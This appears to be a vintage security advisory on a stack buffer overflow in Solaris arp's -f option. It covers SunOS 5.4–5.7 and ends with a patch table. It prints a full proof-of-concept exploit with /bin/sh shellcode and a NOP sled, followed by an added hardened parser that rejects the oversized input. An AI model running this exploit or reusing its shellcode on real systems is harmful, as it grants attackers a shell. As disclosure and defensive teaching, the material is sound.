COMMAND

    arp

SYSTEMS AFFECTED

    SunOS 5.4..5.7 (sparc & x86)

PROBLEM

    Sor Pablo Sebastian found the following.  The stack overflow is in
    arp's file() function, which reads entries in from the file  given
    with -f.  The overflow itself is a result of using sscanf, with no
    width on its %s  conversions,  to split each line into  fixed-size
    fields,  so a token longer than its field runs past the buffer. In
    typical buffer overflow fashion, file()'s saved return address  is
    overwritten with a controlled part of the supplied string.

    The code:

    #include <fcntl.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    /* arpexp.c
    
       arp overflow proof of concept by ahmed@securityfocus.com
       tested on x86 solaris 7,8beta
    
       default should work.  if not, arg1 = offset. +- by 100's
    
       Copyright Security-Focus.com, 11/2000
    */
    
    /* Returns the current stack pointer.  x86 only: %esp is left in
       %eax, which is where the caller reads the return value. */
    long get_esp() { __asm__("movl %esp,%eax"); }
    
    int main(int ac, char **av)
    {
      /* x86 Solaris shellcode that execs /bin/sh; contains no NUL bytes,
         so strlen() gives its full length */
      char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
                     "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
                     "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
                     "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
                     "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
                     "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
                     "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
                     "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
                     "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
                     "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
                     "\xff\xff";
    
      /* values patched into the over-long token: `magic` at offset 52,
         the guessed shellcode address `r` at offset 76, where file()'s
         saved return address is overwritten */
      unsigned long magic = 0x8047b78;
      unsigned long r = get_esp() + 600;
      unsigned char buf[300];
      char env[sizeof(buf) + 1];      /* NUL-terminated copy for putenv() */
      int f;
    
      /* optional adjustment of the return address guess */
      if (ac == 2)
        r += atoi(av[1]);
    
      /* file payload: four short fields, then one 300-byte token that
         overflows the fixed-size field buffer inside arp's file() */
      memset(buf,0x61,sizeof(buf));
      memcpy(buf+52,&magic,4);
      memcpy(buf+76,&r,4);
    
      f = open("/tmp/ypx",O_CREAT|O_WRONLY|O_TRUNC,0600);
      if (f < 0) { perror("open"); return 1; }
      write(f,"1 2 3 4 ",8);
      write(f,buf,sizeof(buf));
      close(f);
    
      /* plant the shellcode in arp's environment as LOL=<NOP sled><shell>,
         so the return address only has to land somewhere in the sled */
      memset(env,0x90,sizeof(buf));
      memcpy(env,"LOL=",4);
      memcpy(env+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
      env[sizeof(buf)] = '\0';
      putenv(env);
    
      /* arp -f parses the file and overflows; the shell inherits LOL */
      system("/usr/sbin/arp -f /tmp/ypx");
      unlink("/tmp/ypx");
    
      return 0;
    }
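    The sscanf pattern behind the overflow, beside a parser that refuses
    the file the proof of concept writes.  This is an added example, not
    arp's source or the advisory's own code: the field width (50 bytes),
    the field count (5) and the function names are assumptions made for
    illustration.

```c
#include <stdio.h>
#include <string.h>

/*
 * Constructed example (not arp's source): a line parser in the style of
 * arp -f, which reads "host ether_addr [temp] [pub]" entries. The field
 * width (50 bytes) and field count (5) are assumptions for illustration.
 */
#define NFIELDS  5
#define FIELDLEN 50

struct arp_entry {
    int  nfields;
    char field[NFIELDS][FIELDLEN];
};

/*
 * The pattern the advisory describes. An unbounded %s conversion writes
 * the whole token regardless of the destination size, so a token of more
 * than FIELDLEN-1 bytes runs off the end of arg[] into whatever follows it
 * on the stack, including the saved return address. Shown only as a
 * comment; it is never called here.
 *
 *     char arg[NFIELDS][FIELDLEN];
 *     sscanf(line, "%s %s %s %s %s", arg[0], arg[1], arg[2], arg[3], arg[4]);
 */

/*
 * Hardened replacement: tokenize by hand with strspn/strcspn, measure each
 * token before copying it, and refuse anything that does not fit. This
 * rejects over-long input instead of silently truncating it, which a
 * width-limited "%49s" would do.
 *
 * Returns the number of fields on success, or a negative code:
 *   -1 too many fields, -2 a field is too long, -3 too few fields.
 */
int parse_arp_line(const char *line, struct arp_entry *e)
{
    const char *p = line;

    memset(e, 0, sizeof(*e));
    for (;;) {
        size_t len;

        p += strspn(p, " \t\r\n");          /* skip separators */
        if (*p == '\0')
            break;
        len = strcspn(p, " \t\r\n");        /* length of the next token */
        if (e->nfields == NFIELDS)
            return -1;
        if (len >= FIELDLEN)                /* would not fit with its NUL */
            return -2;
        memcpy(e->field[e->nfields], p, len);
        e->field[e->nfields][len] = '\0';
        e->nfields++;
        p += len;
    }
    if (e->nfields < 2)                     /* need host and ether address */
        return -3;
    return e->nfields;
}

/* Small wrappers so the parser's verdicts can be checked directly. */
int arp_line_field_count(const char *line)
{
    struct arp_entry e;
    return parse_arp_line(line, &e);
}

int arp_line_field_is(const char *line, int i, const char *want)
{
    struct arp_entry e;
    if (parse_arp_line(line, &e) < 0 || i >= e.nfields)
        return 0;
    return strcmp(e.field[i], want) == 0;
}

/*
 * Rebuild the file body the PoC writes: "1 2 3 4 " followed by 300 bytes
 * of 'a' (the addresses it patches in do not matter for the length check).
 * The fifth token is 300 bytes long, so the parser must return -2.
 */
int parse_poc_style_line(void)
{
    struct arp_entry e;
    char line[8 + 300 + 1];

    memcpy(line, "1 2 3 4 ", 8);
    memset(line + 8, 'a', 300);
    line[sizeof(line) - 1] = '\0';
    return parse_arp_line(line, &e);
}

int main(void)
{
    printf("normal entry: %d fields\n",
           arp_line_field_count("host1 8:0:20:1:2:3 temp pub\n"));
    printf("PoC-style entry: verdict %d\n", parse_poc_style_line());
    return 0;
}
```

    If sscanf has to stay, give every %s a width ("%49s" for a 50-byte
    field); that stops the write at the buffer's end but leaves the rest
    of the token to be picked up as the next field, so a length check
    before copying, as above, is the safer fix.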

SOLUTION

    The  following  patches  are  available  in  relation to the above
    problem:

        OS Version          Patch ID
        ============================
        SunOS 5.7           109709-01
        SunOS 5.7_x86       109710-01
        SunOS 5.6           109719-01
        SunOS 5.6_x86       109720-01
        SunOS 5.5.1         109721-01
        SunOS 5.5.1_x86     109722-01
        SunOS 5.5           109707-01
        SunOS 5.5_x86       109708-01
        SunOS 5.4           109723-01
        SunOS 5.4_x86       109724-01